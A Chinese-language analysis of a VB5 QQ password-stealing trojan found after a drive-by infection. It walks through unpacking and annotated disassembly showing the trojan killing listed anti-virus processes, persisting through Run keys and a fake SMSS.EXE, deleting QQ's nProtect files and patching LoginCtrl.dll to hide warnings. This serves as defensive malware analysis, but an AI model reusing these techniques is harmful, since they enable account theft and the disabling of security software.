【破文标题】某病毒分析
【破文作者】FoBnN
【作者邮箱】fobcrackgp[at]163.com
【作者主页】www.hack58.com
【破解工具】OD+LordPE+xxxxxxxxxxxxx
【破解平台】XP+SP2
【软件名称】某盗号程序,现在偶也不知道是啥
【软件大小】48K
【原版下载】
【保护方式】NSPACK
【软件简介】无
【破解声明】MD鄙视挂马之人,也要感谢他,没他挂马也没偶这篇分析!
------------------------------------------------------------------------
起因:
今天在网上寻找些学习资料,无意中打开一个站,没多少时间发现进程数达到87个,!!!!狂汗!!!.
查看源代码后发现被挂了马,利用的是GOLDSUN写的ADO缺陷。
迅速断网重启.先用QQKAV,RAV查了一遍,发现黑防鸽子和GSERVERVIP2006,还有几个盗号的软件。RAV监视服务无法
启动,又发现BAIGOO、CND、超级影吧等流氓软件泛滥,一一除之.打开QQ发现NSPROTECT启动失败,但并未出现红叉.大事不妙.
①.
打开TASKMGR(任务管理器),发现有两个SMSS.exe。其中一个是以偶当前用户身份运行,并非SYSTEM,很可疑
===================================================================================
发现其在%windir%下,于是CTRL+C复制发现复制不了,拿出UE打开,然后保存.终于复制下来,结束进程。删除文件.
用PEID查看
看到区段为XXX1,XXX2,XXX3判断为NSPACK
===================================================================================
OD中用ESP定律到OEP,DUMP,修复,文件从48K变为264K
; Unpacked OEP of the dumped VB5 executable (OllyDbg listing, Intel syntax).
00403644 > 68 6C394000 push dumped_.0040396C ;OEP — VB5 entry: the pushed pointer is the single argument ThunRTMain receives (presumably the VB project header; not shown here)
00403649 E8 F0FFFFFF call <jmp.&msvbvm50.ThunRTMain> ; hand-off to the VB runtime; the dump was taken with EIP at the OEP above
0040364E 0000 add byte ptr ds:[eax],al ; the 00 bytes after the call are padding/data that OD decodes as 'add [eax],al' — presumably never executed
00403650 0000 add byte ptr ds:[eax],al
00403652 0000 add byte ptr ds:[eax],al
00403654 3000 xor byte ptr ds:[eax],al
00403656 0000 add byte ptr ds:[eax],al
====================================================================================
②.因为发现是VB编写的程序,用GetVBRes载入分析资源,看看有没有关键信息.
晕死,查看一下发现不少,如图1、图2。
====================================================================================
③用OD分析吧
; Two fragments of the main form code: a decoy message box, then the call into the
; anti-virus check routine listed below. The enclosing procedure is not shown.
00413567 E8 28FFFEFF call <jmp.&msvbvm50.rtcMsgBox> ; at run time this pops up a misleading message box (author's note)
00414A3E /74 05 je short dumped_.00414A45 ; condition set outside the excerpt
00414A40 |E9 552A0000 jmp dumped_.0041749A
00414A45 \C745 FC 0A00000>mov dword ptr ss:[ebp-4],0A ; [ebp-4] is written before each statement in every procedure below — presumably VB's statement counter for the error handler
00414A4C E8 092F0000 call dumped_.0041795A ; this CALL checks for anti-virus software and sabotages it (author's note) — listed next
-----------
;-----------------------------------------------------------------------
; sub_0041795A — anti-virus process scan / kill routine (author's description).
; Listing excerpt: everything between 00417ACE and 004182D2 is elided except the
; string-table loads; only the prologue, the process-enumeration setup and the
; table of target process names are visible.
; Frame: 0x538 bytes of locals (see __vbaChkstk); VB SEH frame via __vbaExceptHandler;
; On Error Resume Next (so a failed kill is silently ignored).
; NOTE(review): 00405500 / 00405540 / 00410BD3 are helpers not shown here. The
; argument pattern — (2, 0) then (handle, &record) with record.dwSize = 0x128 and a
; 0x104-char fixed string inside it — matches CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0)
; and Process32First(hSnap, &pe32) with sizeof(PROCESSENTRY32)=0x128 and szExeFile[MAX_PATH];
; confirm against the VB Declare table before relying on those names.
;-----------------------------------------------------------------------
0041795A 55 push ebp
0041795B 8BEC mov ebp,esp
0041795D 83EC 18 sub esp,18
00417960 68 06324000 push <jmp.&msvbvm50.__vbaExceptHandler> ; install VB's SEH handler ...
00417965 64:A1 00000000 mov eax,dword ptr fs:[0]
0041796B 50 push eax
0041796C 64:8925 0000000>mov dword ptr fs:[0],esp ; ... linked into the fs:[0] chain
00417973 B8 38050000 mov eax,538 ; 0x538 bytes of locals
00417978 E8 83B8FEFF call <jmp.&msvbvm50.__vbaChkstk> ; stack probe + allocation
0041797D 53 push ebx
0041797E 56 push esi
0041797F 57 push edi
00417980 8965 E8 mov dword ptr ss:[ebp-18],esp
00417983 C745 EC C01C400>mov dword ptr ss:[ebp-14],dumped_.00401CC0 ; VB frame bookkeeping (standard prologue)
0041798A 8365 F0 00 and dword ptr ss:[ebp-10],0
0041798E 8365 F4 00 and dword ptr ss:[ebp-C],0
00417992 C745 FC 0100000>mov dword ptr ss:[ebp-4],1 ; statement counter (presumably used by the error handler)
00417999 C745 FC 0200000>mov dword ptr ss:[ebp-4],2
004179A0 6A FF push -1
004179A2 E8 81BAFEFF call <jmp.&msvbvm50.__vbaOnError> ; -1 => On Error Resume Next
004179A7 C745 FC 0300000>mov dword ptr ss:[ebp-4],3
004179AE 6A 00 push 0 ; 2nd argument = 0
004179B0 6A 02 push 2 ; 1st argument = 2 (TH32CS_SNAPPROCESS if this is CreateToolhelp32Snapshot — inferred)
004179B2 E8 49DBFEFF call dumped_.00405500 ; Declare thunk, name not visible
004179B7 8985 54FDFFFF mov dword ptr ss:[ebp-2AC],eax
004179BD E8 0CBAFEFF call <jmp.&msvbvm50.__vbaSetSystemError> ; VB Declare epilogue: records GetLastError as Err.LastDllError
004179C2 8B85 54FDFFFF mov eax,dword ptr ss:[ebp-2AC]
004179C8 8945 D8 mov dword ptr ss:[ebp-28],eax ; [ebp-28] = returned handle
004179CB C745 FC 0400000>mov dword ptr ss:[ebp-4],4
004179D2 C785 A4FDFFFF 2>mov dword ptr ss:[ebp-25C],128 ; record.dwSize = 0x128 (296) — equals sizeof(PROCESSENTRY32)
004179DC C745 FC 0500000>mov dword ptr ss:[ebp-4],5
004179E3 8D85 A4FDFFFF lea eax,dword ptr ss:[ebp-25C] ; UDT (Unicode copy)
004179E9 50 push eax
004179EA 8D85 28FCFFFF lea eax,dword ptr ss:[ebp-3D8] ; ANSI shadow copy of the UDT
004179F0 50 push eax
004179F1 68 48534000 push dumped_.00405348 ; UDT type descriptor
004179F6 E8 1DBBFEFF call <jmp.&msvbvm50.__vbaRecUniToAnsi> ; marshal the record to ANSI for the API call
004179FB 50 push eax ; &record
004179FC FF75 D8 push dword ptr ss:[ebp-28] ; handle
004179FF E8 3CDBFEFF call dumped_.00405540 ; Declare thunk: (handle, &record) — Process32First-like, inferred
00417A04 8985 54FDFFFF mov dword ptr ss:[ebp-2AC],eax
00417A0A E8 BFB9FEFF call <jmp.&msvbvm50.__vbaSetSystemError>
00417A0F 8D85 28FCFFFF lea eax,dword ptr ss:[ebp-3D8]
00417A15 50 push eax
00417A16 8D85 A4FDFFFF lea eax,dword ptr ss:[ebp-25C]
00417A1C 50 push eax
00417A1D 68 48534000 push dumped_.00405348
00417A22 E8 EBBAFEFF call <jmp.&msvbvm50.__vbaRecAnsiToUni> ; marshal the filled record back to Unicode
00417A27 83BD 54FDFFFF 0>cmp dword ptr ss:[ebp-2AC],0
00417A2E 0F84 EE130000 je dumped_.00418E22 ; enumeration returned 0 (FALSE) -> leave the routine
00417A34 C745 FC 0700000>mov dword ptr ss:[ebp-4],7
00417A3B 66:83A5 58FDFFF>and word ptr ss:[ebp-2A8],0
00417A43 8D85 58FDFFFF lea eax,dword ptr ss:[ebp-2A8]
00417A49 50 push eax
00417A4A 8D85 C8FDFFFF lea eax,dword ptr ss:[ebp-238] ; fixed-length string field inside the record
00417A50 50 push eax
00417A51 68 04010000 push 104 ; 0x104 = MAX_PATH characters
00417A56 E8 79B9FEFF call <jmp.&msvbvm50.__vbaStrFixstr> ; fixed-length field -> BSTR
00417A5B 8BD0 mov edx,eax
00417A5D 8D8D A0FDFFFF lea ecx,dword ptr ss:[ebp-260]
00417A63 E8 96B9FEFF call <jmp.&msvbvm50.__vbaStrMove>
00417A68 50 push eax
00417A69 E8 6591FFFF call dumped_.00410BD3 ; helper not shown — presumably trims the padded name; confirm
00417A6E 8BD0 mov edx,eax
00417A70 8D8D 9CFDFFFF lea ecx,dword ptr ss:[ebp-264]
00417A76 E8 83B9FEFF call <jmp.&msvbvm50.__vbaStrMove>
00417A7B FFB5 A0FDFFFF push dword ptr ss:[ebp-260]
00417A81 8D85 C8FDFFFF lea eax,dword ptr ss:[ebp-238]
00417A87 50 push eax
00417A88 68 04010000 push 104
00417A8D E8 36B9FEFF call <jmp.&msvbvm50.__vbaLsetFixstr> ; LSet the string back into the fixed-length field
00417A92 8B85 9CFDFFFF mov eax,dword ptr ss:[ebp-264]
00417A98 8985 E8FAFFFF mov dword ptr ss:[ebp-518],eax
00417A9E 83A5 9CFDFFFF 0>and dword ptr ss:[ebp-264],0
00417AA5 8B85 E8FAFFFF mov eax,dword ptr ss:[ebp-518]
00417AAB 8985 94FDFFFF mov dword ptr ss:[ebp-26C],eax ; Variant holding the process name
00417AB1 C785 8CFDFFFF 0>mov dword ptr ss:[ebp-274],8 ; VT_BSTR
00417ABB 8D85 8CFDFFFF lea eax,dword ptr ss:[ebp-274]
00417AC1 50 push eax
00417AC2 8D85 7CFDFFFF lea eax,dword ptr ss:[ebp-284]
00417AC8 50 push eax
00417AC9 E8 A0B8FEFF call <jmp.&msvbvm50.rtcUpperCaseVar> ; UCase(name) — the patterns below are all upper-case
; Target table: one compare block per entry, each 0x127 bytes apart (the blocks themselves are elided
; from the listing). The '*' wildcards suggest a Like-style match; the names are AV / firewall processes.
00417ACE C785 64FDFFFF 7>mov dword ptr ss:[ebp-29C],dumped_.00408974 ; UNICODE "RAVMON.EXE" ; Rising (瑞星) anti-virus monitor
00417BF5 C785 64FDFFFF 9>mov dword ptr ss:[ebp-29C],dumped_.00408990 ; UNICODE "TROJDIE*"
00417D1C C785 64FDFFFF A>mov dword ptr ss:[ebp-29C],dumped_.004089A8 ; UNICODE "KPOP*"
00417E43 C785 64FDFFFF B>mov dword ptr ss:[ebp-29C],dumped_.004089B8 ; UNICODE "CCENTER*"
00417F6A C785 64FDFFFF D>mov dword ptr ss:[ebp-29C],dumped_.004089D0 ; UNICODE "*ASSISTSE*"
00418084 C785 64FDFFFF E>mov dword ptr ss:[ebp-29C],dumped_.004089EC ; UNICODE "KPFW*"
004181AB C785 64FDFFFF F>mov dword ptr ss:[ebp-29C],dumped_.004089FC ; UNICODE "AGENTSVR*"
004182D2 C785 64FDFFFF 1>mov dword ptr ss:[ebp-29C],dumped_.00408A14 ; UNICODE "KV*" ; there are many more entries; all the strong products are in the list (author's note)
=======================================================================================
; Autostart via the legacy RunServices key (author's caption: "service start"). Both the key
; and the value name are usable registry indicators for cleanup.
004168F1 68 90864000 push dumped_.00408690 ; UNICODE "SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\Runservices" ; persistence key
004169D9 68 78864000 push dumped_.00408678 ; UNICODE "TProgram" ; value name of the autostart entry (same name is queried under ...\RUN below)
............................................................服务启动
;-----------------------------------------------------------------------
; Persistence excerpt: 00416666–00416866, then a single line at 00416A70.
; The enclosing procedure starts before 00416666 and continues past 00416866.
; NOTE(review): 00405898 / 004057D4 / 00405858 / 0041971C are Declare thunks
; not shown here. The API names suggested below are inferred from the argument
; patterns and the constants 0x80000002 (= HKEY_LOCAL_MACHINE) and type 1
; (= REG_SZ); confirm against the Declare table.
;-----------------------------------------------------------------------
00416666 /74 4A je short dumped_.004166B2 ; skip the "Shell" write when the preceding test (outside the excerpt) is zero
00416668 |C745 FC 6E00000>mov dword ptr ss:[ebp-4],6E ; statement counter (presumably)
0041666F |6A 0E push 0E ; 14 = length of "Explorer.exe 1" (cbData)
00416671 |68 F4854000 push dumped_.004085F4 ; UNICODE "Explorer.exe 1" ; value data — an Explorer shell value with an extra token; a registry indicator
00416676 |8D45 B4 lea eax,dword ptr ss:[ebp-4C]
00416679 |50 push eax
0041667A |E8 5BCDFEFF call <jmp.&msvbvm50.__vbaStrToAnsi> ; data -> ANSI
0041667F |50 push eax
00416680 |6A 01 push 1 ; type 1 = REG_SZ
00416682 |6A 00 push 0 ; reserved
00416684 |68 E4854000 push dumped_.004085E4 ; UNICODE "Shell" ; value name
00416689 |8D45 B8 lea eax,dword ptr ss:[ebp-48]
0041668C |50 push eax
0041668D |E8 48CDFEFF call <jmp.&msvbvm50.__vbaStrToAnsi> ; name -> ANSI
00416692 |50 push eax
00416693 |FF75 CC push dword ptr ss:[ebp-34] ; key handle opened earlier (outside the excerpt)
00416696 |E8 FDF1FEFF call dumped_.00405898 ; (hKey,"Shell",0,REG_SZ,"Explorer.exe 1",14) — RegSetValueExA-shaped, inferred
0041669B |E8 2ECDFEFF call <jmp.&msvbvm50.__vbaSetSystemError> ; VB Declare epilogue (Err.LastDllError)
004166A0 |8D45 B4 lea eax,dword ptr ss:[ebp-4C]
004166A3 |50 push eax
004166A4 |8D45 B8 lea eax,dword ptr ss:[ebp-48]
004166A7 |50 push eax
004166A8 |6A 02 push 2
004166AA |E8 37CDFEFF call <jmp.&msvbvm50.__vbaFreeStrList> ; free the two ANSI temporaries
004166AF |83C4 0C add esp,0C
004166B2 \C745 FC 7000000>mov dword ptr ss:[ebp-4],70
004166B9 8D45 CC lea eax,dword ptr ss:[ebp-34] ; &hKey (out)
004166BC 50 push eax
004166BD 68 18864000 push dumped_.00408618 ; UNICODE "SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN" ; second autostart location
004166C2 8D45 B8 lea eax,dword ptr ss:[ebp-48]
004166C5 50 push eax
004166C6 E8 0FCDFEFF call <jmp.&msvbvm50.__vbaStrToAnsi>
004166CB 50 push eax
004166CC 68 02000080 push 80000002 ; HKEY_LOCAL_MACHINE
004166D1 E8 FEF0FEFF call dumped_.004057D4 ; (HKLM, subkey, &hKey) — RegOpenKey/RegCreateKey-shaped, inferred
004166D6 8985 18FFFFFF mov dword ptr ss:[ebp-E8],eax
004166DC E8 EDCCFEFF call <jmp.&msvbvm50.__vbaSetSystemError>
004166E1 33C0 xor eax,eax
004166E3 83BD 18FFFFFF 0>cmp dword ptr ss:[ebp-E8],0
004166EA 0F94C0 sete al
004166ED F7D8 neg eax ; VB Boolean: True (-1) when the call returned 0
004166EF 66:8985 0CFFFFF>mov word ptr ss:[ebp-F4],ax
004166F6 8D4D B8 lea ecx,dword ptr ss:[ebp-48]
004166F9 E8 06CDFEFF call <jmp.&msvbvm50.__vbaFreeStr>
004166FE 0FBF85 0CFFFFFF movsx eax,word ptr ss:[ebp-F4]
00416705 85C0 test eax,eax
00416707 0F84 D9010000 je dumped_.004168E6 ; continue only if the key was opened (result == 0)
0041670D C745 FC 7100000>mov dword ptr ss:[ebp-4],71
00416714 C785 58FFFFFF E>mov dword ptr ss:[ebp-A8],dumped_.004062E4 ; fill character for String$ (value not visible)
0041671E C785 50FFFFFF 0>mov dword ptr ss:[ebp-B0],8 ; VT_BSTR
00416728 8D95 50FFFFFF lea edx,dword ptr ss:[ebp-B0]
0041672E 8D4D 90 lea ecx,dword ptr ss:[ebp-70]
00416731 E8 CCCBFEFF call <jmp.&msvbvm50.__vbaVarDup>
00416736 8D45 90 lea eax,dword ptr ss:[ebp-70]
00416739 50 push eax
0041673A 68 2C010000 push 12C ; 300
0041673F 8D45 80 lea eax,dword ptr ss:[ebp-80]
00416742 50 push eax
00416743 E8 AECBFEFF call <jmp.&msvbvm50.rtcStringVar> ; String$(300, c) -> receive buffer
00416748 8D45 80 lea eax,dword ptr ss:[ebp-80]
0041674B 50 push eax
0041674C E8 35CCFEFF call <jmp.&msvbvm50.__vbaStrVarMove>
00416751 8BD0 mov edx,eax
00416753 8D4D D0 lea ecx,dword ptr ss:[ebp-30]
00416756 E8 A3CCFEFF call <jmp.&msvbvm50.__vbaStrMove> ; [ebp-30] = 300-char buffer
0041675B 8D45 80 lea eax,dword ptr ss:[ebp-80]
0041675E 50 push eax
0041675F 8D45 90 lea eax,dword ptr ss:[ebp-70]
00416762 50 push eax
00416763 6A 02 push 2
00416765 E8 0ACCFEFF call <jmp.&msvbvm50.__vbaFreeVarList>
0041676A 83C4 0C add esp,0C
0041676D C745 FC 7200000>mov dword ptr ss:[ebp-4],72
00416774 C785 14FFFFFF 2>mov dword ptr ss:[ebp-EC],12C ; buffer size (in/out)
0041677E C785 18FFFFFF 0>mov dword ptr ss:[ebp-E8],1 ; type (in/out)
00416788 8D85 14FFFFFF lea eax,dword ptr ss:[ebp-EC] ; &cbData
0041678E 50 push eax
0041678F FF75 D0 push dword ptr ss:[ebp-30] ; buffer
00416792 8D45 B4 lea eax,dword ptr ss:[ebp-4C]
00416795 50 push eax
00416796 E8 3FCCFEFF call <jmp.&msvbvm50.__vbaStrToAnsi>
0041679B 50 push eax
0041679C 8D85 18FFFFFF lea eax,dword ptr ss:[ebp-E8] ; &type
004167A2 50 push eax
004167A3 6A 00 push 0 ; reserved
004167A5 68 78864000 push dumped_.00408678 ; UNICODE "TProgram" ; value name
004167AA 8D45 B8 lea eax,dword ptr ss:[ebp-48]
004167AD 50 push eax
004167AE E8 27CCFEFF call <jmp.&msvbvm50.__vbaStrToAnsi>
004167B3 50 push eax
004167B4 FF75 CC push dword ptr ss:[ebp-34] ; hKey
004167B7 E8 9CF0FEFF call dumped_.00405858 ; (hKey,"TProgram",0,&type,buf,&cb) — RegQueryValueExA-shaped, inferred
004167BC 8985 10FFFFFF mov dword ptr ss:[ebp-F0],eax
004167C2 E8 07CCFEFF call <jmp.&msvbvm50.__vbaSetSystemError>
004167C7 FF75 B4 push dword ptr ss:[ebp-4C]
004167CA 8D45 D0 lea eax,dword ptr ss:[ebp-30]
004167CD 50 push eax
004167CE E8 EFCBFEFF call <jmp.&msvbvm50.__vbaStrToUnicode> ; copy the ANSI buffer back into [ebp-30]
004167D3 33C0 xor eax,eax
004167D5 83BD 10FFFFFF 0>cmp dword ptr ss:[ebp-F0],0
004167DC 0F95C0 setne al
004167DF F7D8 neg eax ; True (-1) when the query FAILED (non-zero result)
004167E1 66:8985 0CFFFFF>mov word ptr ss:[ebp-F4],ax
004167E8 8D45 B4 lea eax,dword ptr ss:[ebp-4C]
004167EB 50 push eax
004167EC 8D45 B8 lea eax,dword ptr ss:[ebp-48]
004167EF 50 push eax
004167F0 6A 02 push 2
004167F2 E8 EFCBFEFF call <jmp.&msvbvm50.__vbaFreeStrList>
004167F7 83C4 0C add esp,0C
004167FA 0FBF85 0CFFFFFF movsx eax,word ptr ss:[ebp-F4]
00416801 85C0 test eax,eax
00416803 0F84 DD000000 je dumped_.004168E6 ; fall through only when "TProgram" is absent — i.e. (re)install only if not yet registered, presumably
00416809 C745 FC 7300000>mov dword ptr ss:[ebp-4],73
00416810 E8 072F0000 call dumped_.0041971C ; returns a string; presumably the drop directory (the author found the copy under %windir%) — confirm
00416815 8BD0 mov edx,eax
00416817 8D4D A0 lea ecx,dword ptr ss:[ebp-60]
0041681A E8 DFCBFEFF call <jmp.&msvbvm50.__vbaStrMove>
0041681F 8B45 A0 mov eax,dword ptr ss:[ebp-60]
00416822 8985 ECFEFFFF mov dword ptr ss:[ebp-114],eax ; keep a copy of the directory string
00416828 8365 A0 00 and dword ptr ss:[ebp-60],0
0041682C E8 EB2E0000 call dumped_.0041971C ; same helper again
00416831 8BD0 mov edx,eax
00416833 8D4D B4 lea ecx,dword ptr ss:[ebp-4C]
00416836 E8 C3CBFEFF call <jmp.&msvbvm50.__vbaStrMove>
0041683B 50 push eax
0041683C 68 08794000 push dumped_.00407908 ; UNICODE "\SMSS.EXE" ; file name of the malware's own copy — masquerades as the system smss.exe (what the author saw in Task Manager)
00416841 E8 9ACBFEFF call <jmp.&msvbvm50.__vbaStrCat> ; dir & "\SMSS.EXE"
00416846 8BD0 mov edx,eax
00416848 8D4D B0 lea ecx,dword ptr ss:[ebp-50]
0041684B E8 AECBFEFF call <jmp.&msvbvm50.__vbaStrMove>
00416850 50 push eax
00416851 E8 9CCBFEFF call <jmp.&msvbvm50.__vbaLenBstr> ; Len(path) — used below; the consumer is outside the excerpt
00416856 50 push eax
00416857 8B95 ECFEFFFF mov edx,dword ptr ss:[ebp-114]
0041685D 8D4D B8 lea ecx,dword ptr ss:[ebp-48]
00416860 E8 99CBFEFF call <jmp.&msvbvm50.__vbaStrMove>
00416865 50 push eax
00416866 68 08794000 push dumped_.00407908 ; UNICODE "\SMSS.EXE" ; author's note: ties itself to Explorer (the "Shell" value above)
; … listing between 00416866 and 00416A70 elided by the author …
00416A70 68 08794000 push dumped_.00407908 ; UNICODE "\SMSS.EXE" ; same path built a third time
盗号之QQ篇.
;-----------------------------------------------------------------------
; sub_004280EC(path) — QQ part of the credential theft (author's heading).
; [ebp+8] is a BSTR argument, copied to [ebp-2C]; every file name below is
; concatenated onto it, so per the author it is the QQ install directory.
; Frame: 0xC4 bytes; On Error Resume Next. The routine continues past 004281C7.
; Behaviour visible here: deletes two files from that directory with Kill
; (rtcKillFiles). The author reported QQ's nProtect component failing to start,
; which fits these deletions (inference — confirm).
;-----------------------------------------------------------------------
004280EC 55 push ebp
004280ED 8BEC mov ebp,esp
004280EF 83EC 18 sub esp,18
004280F2 68 06324000 push <jmp.&msvbvm50.__vbaExceptHandler> ; VB SEH frame
004280F7 64:A1 00000000 mov eax,dword ptr fs:[0]
004280FD 50 push eax
004280FE 64:8925 0000000>mov dword ptr fs:[0],esp
00428105 B8 C4000000 mov eax,0C4 ; 0xC4 bytes of locals
0042810A E8 F1B0FDFF call <jmp.&msvbvm50.__vbaChkstk>
0042810F 53 push ebx
00428110 56 push esi
00428111 57 push edi
00428112 8965 E8 mov dword ptr ss:[ebp-18],esp
00428115 C745 EC 382C400>mov dword ptr ss:[ebp-14],dumped_.00402C38
0042811C 8365 F0 00 and dword ptr ss:[ebp-10],0
00428120 8365 F4 00 and dword ptr ss:[ebp-C],0
00428124 C745 FC 0100000>mov dword ptr ss:[ebp-4],1 ; statement counter (presumably)
0042812B 8B55 08 mov edx,dword ptr ss:[ebp+8] ; argument string
0042812E 8D4D D4 lea ecx,dword ptr ss:[ebp-2C]
00428131 E8 D4B2FDFF call <jmp.&msvbvm50.__vbaStrCopy> ; [ebp-2C] = copy of the argument (the directory)
00428136 68 649F4000 push dumped_.00409F64 ; array descriptor
0042813B 8D45 B4 lea eax,dword ptr ss:[ebp-4C]
0042813E 50 push eax
0042813F E8 A0B1FDFF call <jmp.&msvbvm50.__vbaAryConstruct> ; local array at [ebp-4C]; its use is outside the excerpt
00428144 C745 FC 0200000>mov dword ptr ss:[ebp-4],2
0042814B 6A FF push -1
0042814D E8 D6B2FDFF call <jmp.&msvbvm50.__vbaOnError> ; On Error Resume Next
00428152 C745 FC 0300000>mov dword ptr ss:[ebp-4],3
00428159 68 DC9E4000 push dumped_.00409EDC ; UNICODE "0000010001000C0C000001000800E804" ; 16 hex byte pairs; decoded they look like an ICO header (12x12, 8 bpp) — speculative, verify by dumping [ebp-54]
0042815E E8 8690FEFF call dumped_.004111E9 ; helper not shown — presumably hex-decodes the string
00428163 8BD0 mov edx,eax
00428165 8D4D AC lea ecx,dword ptr ss:[ebp-54]
00428168 E8 91B2FDFF call <jmp.&msvbvm50.__vbaStrMove> ; [ebp-54] = decoded blob
0042816D C745 FC 0400000>mov dword ptr ss:[ebp-4],4
00428174 FF75 D4 push dword ptr ss:[ebp-2C] ; directory
00428177 68 249F4000 push dumped_.00409F24 ; UNICODE "\qqpnpp.sys" ; author's note: "qqpnpp.sys"
0042817C E8 5FB2FDFF call <jmp.&msvbvm50.__vbaStrCat> ; dir & "\qqpnpp.sys" (author: points into the QQ install directory)
00428181 8945 94 mov dword ptr ss:[ebp-6C],eax ; Variant value
00428184 C745 8C 0800000>mov dword ptr ss:[ebp-74],8 ; VT_BSTR
0042818B 8D45 8C lea eax,dword ptr ss:[ebp-74]
0042818E 50 push eax
0042818F E8 F4B2FDFF call <jmp.&msvbvm50.rtcKillFiles> ; Kill dir & "\qqpnpp.sys" — deletes the file (author's note)
00428194 8D4D 8C lea ecx,dword ptr ss:[ebp-74]
00428197 E8 F6B1FDFF call <jmp.&msvbvm50.__vbaFreeVar>
0042819C C745 FC 0500000>mov dword ptr ss:[ebp-4],5
004281A3 E8 7AB2FDFF call <jmp.&msvbvm50.rtcDoEvents> ; DoEvents (author's note: loop / yield)
004281A8 C745 FC 0600000>mov dword ptr ss:[ebp-4],6
004281AF FF75 D4 push dword ptr ss:[ebp-2C]
004281B2 68 389E4000 push dumped_.00409E38 ; UNICODE "\npkcrypt.vxd" ; author's note: "npkcrypt.vxd"
004281B7 E8 24B2FDFF call <jmp.&msvbvm50.__vbaStrCat> ; dir & "\npkcrypt.vxd" (author: QQ install directory)
004281BC 8BD0 mov edx,eax
004281BE 8D4D A0 lea ecx,dword ptr ss:[ebp-60]
004281C1 E8 38B2FDFF call <jmp.&msvbvm50.__vbaStrMove>
004281C6 50 push eax
004281C7 E8 F4B2FDFF call <jmp.&msvbvm50.rtcKillFiles> ; Kill dir & "\npkcrypt.vxd" — deletes the file (author's note)
--------------------------------------------------------------------------------------
;-----------------------------------------------------------------------
; Later part of the same QQ routine (0042832A–004283FF): opens LoginCtrl.dll
; from the directory in [ebp-2C] as file #33 and sets up a For loop over
; file offsets 0x10000 .. LOF step 0x1000. The loop body that performs the
; write is not in the excerpt; the author states the file is patched so
; QQ's red-cross warning does not appear.
;-----------------------------------------------------------------------
0042832A 8D45 9C lea eax,dword ptr ss:[ebp-64]
0042832D 50 push eax
0042832E E8 E3B0FDFF call <jmp.&msvbvm50.__vbaObjSet> ; Set obj = <object in [ebp-64]> (identity not visible here)
00428333 8985 24FFFFFF mov dword ptr ss:[ebp-DC],eax
00428339 8B85 24FFFFFF mov eax,dword ptr ss:[ebp-DC]
0042833F 8B00 mov eax,dword ptr ds:[eax] ; vtable
00428341 FFB5 24FFFFFF push dword ptr ss:[ebp-DC] ; this
00428347 FF50 48 call dword ptr ds:[eax+48] ; vtable slot 0x48/4 = 18 — method cannot be named from the listing
0042834A 8D4D 9C lea ecx,dword ptr ss:[ebp-64]
0042834D E8 BEB0FDFF call <jmp.&msvbvm50.__vbaFreeObj>
00428352 C745 FC 0D00000>mov dword ptr ss:[ebp-4],0D
00428359 FF75 D4 push dword ptr ss:[ebp-2C] ; directory (routine argument)
0042835C 68 409F4000 push dumped_.00409F40 ; UNICODE "\LoginCtrl.dll" ; QQ login control library — the patch target
00428361 E8 7AB0FDFF call <jmp.&msvbvm50.__vbaStrCat>
00428366 8BD0 mov edx,eax
00428368 8D4D A4 lea ecx,dword ptr ss:[ebp-5C]
0042836B E8 8EB0FDFF call <jmp.&msvbvm50.__vbaStrMove>
00428370 50 push eax ; file name
00428371 6A 21 push 21 ; file number #33
00428373 6A FF push -1 ; record length (default)
00428375 68 20100000 push 1020 ; VB open-mode flags (not decoded here)
0042837A E8 EBB0FDFF call <jmp.&msvbvm50.__vbaFileOpen> ; Open dir & "\LoginCtrl.dll" ... As #33 (author: open the file)
0042837F 8D4D A4 lea ecx,dword ptr ss:[ebp-5C]
00428382 E8 7DB0FDFF call <jmp.&msvbvm50.__vbaFreeStr>
00428387 C745 FC 0E00000>mov dword ptr ss:[ebp-4],0E
0042838E E8 8FB0FDFF call <jmp.&msvbvm50.rtcDoEvents> ; DoEvents (author: yield to the system)
00428393 C745 FC 0F00000>mov dword ptr ss:[ebp-4],0F
0042839A C745 94 0400028>mov dword ptr ss:[ebp-6C],80020004 ; DISP_E_PARAMNOTFOUND ...
004283A1 C745 8C 0A00000>mov dword ptr ss:[ebp-74],0A ; ... in a VT_ERROR Variant = VB's "optional argument omitted"
004283A8 8D45 8C lea eax,dword ptr ss:[ebp-74]
004283AB 50 push eax
004283AC E8 69AFFDFF call <jmp.&msvbvm50.rtcRandomize> ; Randomize (no seed)
004283B1 8D4D 8C lea ecx,dword ptr ss:[ebp-74]
004283B4 E8 D9AFFDFF call <jmp.&msvbvm50.__vbaFreeVar>
004283B9 ^ E9 C9FEFFFF jmp dumped_.00428287 ; back to a loop head at 00428287 (outside the excerpt)
004283BE C745 FC 1100000>mov dword ptr ss:[ebp-4],11
004283C5 C645 B0 01 mov byte ptr ss:[ebp-50],1 ; flag byte; its reader is not visible here
004283C9 C745 FC 1200000>mov dword ptr ss:[ebp-4],12
004283D0 6A 21 push 21 ; #33
004283D2 E8 7DB1FDFF call <jmp.&msvbvm50.rtcFileLength> ; LOF(#33) = size of LoginCtrl.dll (author: read the file length)
004283D7 8985 44FFFFFF mov dword ptr ss:[ebp-BC],eax ; loop upper bound
004283DD C785 48FFFFFF 0>mov dword ptr ss:[ebp-B8],1000 ; Step 0x1000
004283E7 C745 DC 0000010>mov dword ptr ss:[ebp-24],10000 ; UNICODE "=::=::\" 比较 ; loop counter starts at 0x10000 — OD's "UNICODE" annotation is a false string match on this immediate; the author's note reads "compare"
004283EE EB 0C jmp short dumped_.004283FC ; For-loop: jump straight to the condition
004283F0 8B45 DC mov eax,dword ptr ss:[ebp-24]
004283F3 0385 48FFFFFF add eax,dword ptr ss:[ebp-B8] ; i += 0x1000
004283F9 8945 DC mov dword ptr ss:[ebp-24],eax
004283FC 8B45 DC mov eax,dword ptr ss:[ebp-24]
; Author's note on the next line: the code above patches LoginCtrl.dll so that the red cross does not appear.
004283FF 3B85 44FFFFFF cmp eax,dword ptr ss:[ebp-BC] 上面对LoginCtrl.dll进行修改,不出现红插
=============================================================================
;-----------------------------------------------------------------------
; Window-class check excerpt (00427E93–00427EE8); the enclosing procedure
; starts and ends outside it. [ebp+8] is passed ByVal to 00406978 and ByRef
; to 00427F67, whose result is compared with window class names — so it is
; presumably a window handle, 00427F67 presumably wraps GetClassName and
; 00406978 presumably returns the parent window (Declare table not shown).
; "#32770" is the class name Windows gives every dialog box.
; Net effect (inferred): detect "an Edit control inside a dialog", which the
; author identifies as the QQ login box.
;-----------------------------------------------------------------------
